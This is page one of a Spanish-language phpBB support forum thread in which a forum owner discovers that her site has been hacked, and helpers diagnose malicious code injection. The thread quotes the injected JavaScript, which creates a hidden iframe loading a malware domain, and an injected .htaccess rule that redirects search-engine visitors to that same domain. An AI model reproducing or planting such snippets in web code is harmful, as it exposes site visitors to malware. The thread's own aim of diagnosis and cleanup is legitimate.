phpBB España Oficial

phpBB España Oficial, Soporte Internacional Oficial del sistema de foros phpBB en Español, extensiones, estilos, traducciones, guías, tutoriales, videos, redes sociales, webmaster.
https://www.phpbb-es.com/foro/

Elementos infectados en mi foro

https://www.phpbb-es.com/foro/viewtopic.php?t=36248

Página 1 de 2

Elementos infectados en mi foro

Publicado: 02 Jul 2012, 16:22
por ebony
Hola, esta mañana he abierto mi foro y me he encontrado con que estaba desplazado a la izquierda. A mí no me saltó el antivirus como sí me suele saltar en otras paginas, pero a un user sí le saltó y le ponía lo siguiente: contiene elementos de la página ptyeses.tk que están infectados y podrían dañar mi ordenador.

Además de que esté desplazado a la iquierda, algunas partes del foro están como descolocadas, las letras se agrandan... etc. Al parecer esto sólo sucede al abrirlo con Internet Explorer, aunque con Firefox también hay algunos desajustes y la pagina del ACP me aparece cortada.

He estado leyendo consultas anteriores sobre temas relacionados y vi que recomendabais que se revisaran los archivos que se habian modificado recientemente. Yo hace unos días estuve intentando instalar un MOD (que al final no funcionó y lo volví a dejar como estaba), así que le pasé el antivirus a los 2 archivos que había modificado y también revisé si ponía algo de ptyeses.tk en ellos, pero nada.


¿Qué tendría que hacer? Gracias de antemano.

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 16:27
por nextgen
Yo no veo nada fuera de lo normal en tu foro, revisa y baja los archivos del ftp y escanealos o bien podes hacerlo desde tu cpanel.

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 16:39
por ebony
¿Lo viste con el IE?

Navegando por el foro si que se notan los desajustes, ya que mucha gente me lo ha comentado. ¿Qué podría ser eso? ¿Un virus?

Por el momento hare lo que me dices, gracias!

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 16:57
por ebony
Le acabo de pasar el antivirus y un anti-malware a todos los archivos y no me aparece nada...

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 16:59
por nextgen
Especifica si has realizado algúna modificación, ya sea antes o despúes de que vieras el "error".
Además por lo que vi en IE el estilo pierde orden en cuando a su código, actualiza el cache de la Plantilla, Temas y del foro.

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 17:16
por ebony
Como expliqué antes, hace unos días estuve intentando instalar un MOD, pero como como no funcionó, lo dejé todo como estaba. Los únicos archivos que había modificado eran functions.php y overall_header.html, pero como ya dije, revisé ambos y no tenían nada.

Eso es lo único que modifiqué recientemente.

Acabo de actualizar el cache y no hay cambio.

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 21:29
por ebony
Aahora tengo otro problema, cuando estoy en una pagina del foro y le doy a Indice general, me reconduce a esto: http://cabaniaseleden.com.ar/stats.php

Me ha empezado a pasar ahora, cuando expuse el problema no sucedía.

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 22:55
por leviatan21
Por suerte el Firefox eso no pasa.

Al parecer tienes una inyección de código malicioso, esto es lo que se ve al principio del código fuente de tu foro :

Código: Seleccionar todo

<script type="text/javascript">
document.write('<iframe src="http://cabaniaseleden.com.ar/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>
tendrás que revisar todos y cada uno de los archivos en tu servidor y buscar cual de ellos es el que lo genera

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 23:08
por ebony
Bufff xD

Espero que todos los problemas sean de eso, porque ya digo que eso de "cabaniaseleden.com.ar/stats.php" me ha empezado a aparecer ahora cuando intento ir al indice del foro (que por cierto, revisé el archivo y tampoco hay nada), cuando expuse el problema aquí me redirigía bien.

Con Firefox tambien sucede, solo que no se ve a simple vista. Como dije antes, el ACP me aparece totalmente cortado.

Por cierto, antes le pase el Malwarebytes a todos los archivos, ¿no debería haberlo detectado?


Muchas gracias por la ayuda!

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 23:40
por leviatan21
ebony escribió:Por cierto, antes le pase el Malwarebytes a todos los archivos, ¿no debería haberlo detectado?
No es un virus, es una inyección de código malicioso que no es lo mismo.

Una inyección de código malicioso es un código que se agrega a un archivo, y que causa inconvenientes, un virus o maleware es otra cosa ;)

Re: Elementos infectados en mi foro

Publicado: 02 Jul 2012, 23:51
por ebony
Ahh ok.

Empece a revisar los archivos, pero estoy viendo que revisar absolutamente todos es un trabajo de chinos :shock: Puedo morir en el intento xD

¿Hay algún "atajo" para buscar? Si no, hace unos días hice una copia de seguridad, ¿si la restaurara se podría solucionar el problema o seguiría existiendo?

Y una última cosa, ¿sabéis a que puede ser debido que me pasase esto? ¿Es obra de una persona o se generó solo? Lo pregunto para poder tomar medidas para que no vuelva a suceder.

Re: Elementos infectados en mi foro

Publicado: 03 Jul 2012, 00:02
por ebony
Bueno, acabo de mirar el archivo .htaccess y me he encontrado esto:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#
No quiero tocar nada porque no soy nada entendida de esto y tiempo atrás casi me cargo el foro por resubir sin querer este archivo :?

Re: Elementos infectados en mi foro

Publicado: 03 Jul 2012, 00:14
por leviatan21
ebony escribió:Bueno, acabo de mirar el archivo .htaccess y me he encontrado esto:
eliminalo del FTP y sube un .htaccess original de phpbb.
ebony escribió:Y una última cosa, ¿sabéis a que puede ser debido que me pasase esto? ¿Es obra de una persona o se generó solo? Lo pregunto para poder tomar medidas para que no vuelva a suceder.
esas cosas deberías preguntales a tu proveedor de hosting, ellos tienen los medios necesarios para saber quien entro a tu cuenta.

¿ Tienes WordPress ?

Re: Elementos infectados en mi foro

Publicado: 03 Jul 2012, 00:44
por ebony
A ver, pero ese en concreto no es el que me viene en la carpeta de phpbb (creo). Me explico: el archivo que yo abri está antes de entrar en la carpeta de phpbb3. En una copia de hace tiempo que tengo del foro, en ese mismo archivo me pone:
# Do not remove this line, otherwise mod_rewrite rules will stop working

RewriteBase /
En el archivo .haccesss que está dentro del foro me aparece esto, que es lo que pone en un archivo nuevo de phpbb:
#
# Uncomment the statement below if you want to make use of
# HTTP authentication and it does not already work.
# This could be required if you are for example using PHP via Apache CGI.
#
#<IfModule mod_rewrite.c>
#RewriteEngine on
#RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#</IfModule>

<Files "config.php">
Order Allow,Deny
Deny from All
</Files>

<Files "common.php">
Order Allow,Deny
Deny from All
</Files>
¿Subo ese que puse arriba? Siento marearos tanto :?

No, no tengo wordpress.

Re: Elementos infectados en mi foro

Publicado: 03 Jul 2012, 00:53
por leviatan21
ebony escribió:A ver, pero ese en concreto no es el que me viene en la carpeta de phpbb (creo). Me explico: el archivo que yo abri está antes de entrar en la carpeta de phpbb3. En una copia de hace tiempo que tengo del foro, en ese mismo archivo me pone:
Eso yo no lo sabia, sube ese que tienes de copia,.
Todos los horarios son UTC+02:00
Página 1 de 2

Desarrollado por phpBB® Forum Software © phpBB Limited

Traducción al español por phpBB España